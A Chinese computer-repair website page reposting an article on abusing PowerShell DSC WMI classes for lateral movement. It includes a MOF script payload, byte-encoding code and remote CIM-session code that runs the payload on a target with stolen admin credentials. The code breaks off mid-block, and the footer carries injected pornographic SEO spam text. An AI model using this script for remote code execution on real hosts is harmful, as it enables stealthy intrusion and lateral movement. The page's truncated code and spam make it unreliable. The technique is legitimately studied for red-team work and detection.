錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
濫用PowerShell DSC進行內網滲透

作者: 佚名  日期:2018-11-08 14:45:02   來源: 本站整理

 利用DSC滲透內網的簡要描述
PowerShell所需狀態配置(DSC)允許用戶直接使用WMI直接執行資源。使用DSC WMI類,攻擊者可以通過濫用內置腳本資源來實現遠程PowerShell代碼執行。利用這個技巧進行內網滲透的好處如下:
1.PowerShell代碼會在WMI服務二進制文件 – wmiprvse.exe的上下文中執行。從逃避入侵檢測的角度(至少在發布此博客文章之前)來看,這種辦法可以稱為比調用Win32_Process的Create方法從wmiprvse.exe生成子進程然后執行命令行更為有益的一種滲透技巧。
2.有效載荷的每個組件都只通過WMI。
3.不需要配置DSC服務的配置(甚至不需要了解DSC相關的知識)。
利用DSC內網滲透時的技術要求
1.ResourceTest方法必須存在于root/Microsoft/Windows/DesiredStateConfiguration命名空間中的MSFT_DSCLocalConfigurationManagerWMI類中。注意:攻擊者也可以選擇調用ResourceGet或ResourceSet方法。PowerShell DSC是在PowerShell v4中引入的,因此并非所有的主機都可以使用此技術。
2.默認情況下,你必須具有管理員憑據才能遠程調用WMI方法。遠程執行時,WMI通過DCOM或WSMan安全設置(取決于所使用的傳輸方法)得到保護。在建立遠程連接時,WMI本身通過特定于目標命名空間的安全描述符來保護,在本文中的示例是root/Microsoft/Windows/DesiredStateConfiguration。
武器化概念驗證
第一步是準備要執行的有效載荷。首先要在目標上執行的PowerShell代碼需要以MOF格式進行格式化。下面是將在目標上執行的有效載荷示例:
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
    ResourceID = "[Script]ScriptExample";
    GetScript = "\"$(Get-Date): I am being GET\"     | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
    TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
    SetScript = "\"$(Get-Date): I am being SET\"     | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
    SourceInfo = "::3::5::Script";
    ModuleName = "PsDesiredStateConfiguration";
    ModuleVersion = "1.0";
    ConfigurationName = "ScriptTest";
};
instance of OMI_ConfigurationDocument
{
    Version="2.0.0";
    MinimumCompatibleVersion = "1.0.0";
    CompatibleVersionAdditionalProperties= {"Omi_BaseResource:ConfigurationName"};
    Author="TestUser";
    GenerationDate="02/26/2018 07:09:21";
    GenerationHost="TestHost";
    Name="ScriptTest";
};
'@
實際上,唯一需要改變的是PowerShell有效載荷。在我們的示例中,我們將調用與上面的代碼中的“TestScript”屬性中的有效載荷相對應的方法ResourceTest。請注意,特殊字符需要轉義!自動MOF生成和有效載荷轉移絕對是可以自動化的。
下一步是將MOF轉換為二進制形式,這是ResourceTest方法所需要的:
# Change this to false if you want to test the payload locally
$ExecuteRemotely = $True
$NormalizedMOFContents = [Text.Encoding]::UTF8.GetString([Text.Encoding]::ASCII.GetBytes($MOFContents))
$NormalizedMOFBytes = [Text.Encoding]::UTF8.GetBytes($NormalizedMOFContents)
$TotalSize = [BitConverter]::GetBytes($NormalizedMOFContents.Length + 4)
if ($ExecuteRemotely) {
    # Prepend the length of the payload
    [Byte[]] $MOFBytes = $TotalSize + $NormalizedMOFBytes
} else {
    # If executing locally, you do not prepend the payload length
    [Byte[]] $MOFBytes = $NormalizedMOFBytes
}
在上面的示例中需要注意的是,如果要在本地測試有效載荷,則不要將有效載荷長度添加到字節數組中,F在你已經正確編碼了有效載荷,剩下要做的就是在目標機器上執行它!
# Specify the credentials of your target
$Credential = Get-Credential -Credential TempUser
$ComputerName = 'TargetHost'
# Establish a remote WMI session with the target system
$RemoteCIMSession = New-CimSession -ComputerName $ComputerName -Credential $Credential
$LCMClass = Get-CimClass -Namespace root/Microsoft/Windows/DesiredStateConfiguration -ClassName MSFT_DSCLocalConfigurationManager -CimSession $RemoteCIMSession
if ($LCMClass -and $LCMClass.CimClassMethods['ResourceTest']) {
    # You may now proceed with lateral movement
    $MethodArgs = @{
        ModuleName       = 'PSDesiredStateConfiguration'
        ResourceType     = 'MSFT_ScriptResource'
        resourceProperty = $MOFBytes
    }
    $Arguments = @{
        Namespace  = 'root/Microsoft/Windows/DesiredStateConfiguration'



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 日韩人妻无码精品一专区| 三上悠亚ssⅰn939无码播放| 免费A级毛片无码A∨中文字幕下载| 久久无码国产专区精品| 亚洲日韩一区二区一无码| 伊人蕉久中文字幕无码专区| 亚洲大尺度无码专区尤物| 狠狠精品干练久久久无码中文字幕 | 秋霞鲁丝片Av无码少妇| 无码无套少妇毛多18PXXXX| 久久久久无码专区亚洲av| 无码国产精品一区二区免费I6| 国产精品三级在线观看无码| 无码一区二区三区免费视频| 国产精品无码一区二区三级| 亚洲高清无码综合性爱视频| 亚洲精品无码专区| 亚洲中文字幕久久精品无码2021 | 熟妇人妻无码中文字幕老熟妇| 曰批全过程免费视频在线观看无码| 无码人妻啪啪一区二区| 无码国产精成人午夜视频一区二区 | 无码人妻精品中文字幕免费| 西西4444www大胆无码| 无码国产精品一区二区免费| 亚洲AV无码一区二区二三区软件 | 亚洲精品无码久久久| 午夜麻豆国产精品无码| 亚洲熟妇av午夜无码不卡| 人妻无码αv中文字幕久久琪琪布| 亚洲精品无码久久久久| AV无码小缝喷白浆在线观看| 特级无码a级毛片特黄| 狼人无码精华AV午夜精品| 国产成年无码久久久久下载| 18禁超污无遮挡无码免费网站国产 | 亚洲精品中文字幕无码蜜桃 | 亚洲Av无码一区二区二三区| 亚洲国产精品无码久久久蜜芽| 亚洲AV中文无码字幕色三| 国产激情无码一区二区app|